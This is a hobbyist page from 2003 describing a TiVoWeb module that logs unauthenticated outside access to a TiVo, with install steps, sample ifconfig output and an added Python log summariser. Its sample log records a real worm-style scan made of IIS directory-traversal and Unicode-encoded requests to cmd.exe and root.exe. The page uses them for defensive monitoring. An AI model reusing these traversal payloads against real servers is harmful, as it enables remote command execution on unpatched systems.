Logging httpd-tt.tcl module

The mods in this module will log accesses from outside your local network that are not authenticated. It's only of use to you if your TiVo is connected to the outside world and you've enabled TiVoWeb's security by putting a username and password in tivoweb.cfg. :)

Accesses from outside your local network from hosts that haven't authenticated with the username and password you set up will be logged.

Note - you'll probably see entries for some of your own accesses. HTTP normally requests authentication on the first access from a host, so the first connection from a host won't be authenticated.

WARNING: If for some reason the mods in this module don't work on your TiVo, you won't be able to shut down TiVoWeb. The only way out of this is to replace the original module and reboot your TiVo.

The mods rely on a call to 'ifconfig -i' to find out your local network details. Before you load this module, check that running 'ifconfig -i' on your TiVo gives output similar to this:

bash-2.02# ifconfig -i
eth0      Link encap:Ethernet  HWaddr 00:0B:AD:BA:BE:01
          inet addr:192.168.123.1  Bcast:192.168.123.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2867 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2674 errors:0 dropped:0 overruns:0 carrier:0 coll:0
          Interrupt:29

To install: load the module into the tivoweb-tcl directory, then Quit and restart TiVoWeb.

If you're unable to access TiVoWeb after loading the module, reload the original httpd-tt.tcl module and reboot your TiVo.

External accesses will be logged in /var/log/httpd, which can be accessed through the TiVoWeb Log module. The log format is: <yyyymmdd:hhmmss> <source ip address>:<source port> <HTTP request> (NB. Times are GMT, and the log is never deleted, so you'll need to keep an eye on its size.)

Here's a sample that got logged on my TiVo a couple of hours after loading the module:

20030103:175827 81.6.239.85:3282 GET /scripts/root.exe?/c+dir HTTP/1.0
20030103:175827 81.6.239.85:3293 GET /MSADC/root.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3304 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3311 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3314 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3317 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3319 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3321 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3323 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3328 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3329 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3330 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3332 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175830 81.6.239.85:3333 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175830 81.6.239.85:3334 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175830 81.6.239.85:3335 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

Hmmm... a 'winnt' directory on a TiVo... Uh-huh ;P
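
The log format above is regular enough to summarise mechanically. The following Python is an added example, not part of the original Tcl module: it builds the local network from the 'inet addr' and 'Mask' fields of ifconfig output and counts logged requests per external source, with first and last seen times in GMT. The sample strings and all function names are constructed for illustration.

```python
import ipaddress
import re
from datetime import datetime, timezone

# Constructed samples in the two formats shown on this page.
IFCONFIG = "inet addr:192.168.123.1  Bcast:192.168.123.255  Mask:255.255.255.0"
LOG = """\
20030103:175827 81.6.239.85:3282 GET /scripts/root.exe?/c+dir HTTP/1.0
20030103:175830 81.6.239.85:3335 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:180102 192.168.123.7:1044 GET / HTTP/1.0
this line is malformed
"""

LINE = re.compile(r"^(\d{8}:\d{6}) (\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5}) (.+)$")

def local_network(ifconfig_text):
    """Build the local network from the 'inet addr' and 'Mask' fields."""
    m = re.search(r"inet addr:(\S+).*?Mask:(\S+)", ifconfig_text)
    if m is None:
        raise ValueError("no inet addr/Mask pair in ifconfig output")
    return ipaddress.ip_network(f"{m.group(1)}/{m.group(2)}", strict=False)

def parse_line(line):
    """Return (gmt_datetime, ip, port, request), or None if malformed."""
    m = LINE.match(line)
    if m is None:
        return None
    try:
        when = datetime.strptime(m.group(1), "%Y%m%d:%H%M%S")
        ip = ipaddress.ip_address(m.group(2))
    except ValueError:  # e.g. month 13 or octet 999
        return None
    return when.replace(tzinfo=timezone.utc), ip, int(m.group(3)), m.group(4)

def summarise(log_text, net):
    """Per external source: [request count, first seen, last seen]."""
    sources, skipped = {}, 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec[1] in net:
            skipped += 1  # malformed, or source inside the local network
            continue
        when, ip = rec[0], str(rec[1])
        entry = sources.setdefault(ip, [0, when, when])
        entry[0] += 1
        entry[1], entry[2] = min(entry[1], when), max(entry[2], when)
    return sources, skipped
```

Call summarise(log_text, local_network(ifconfig_text)) with the contents of /var/log/httpd and the output of 'ifconfig -i'.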


Last updated: 21st May 2003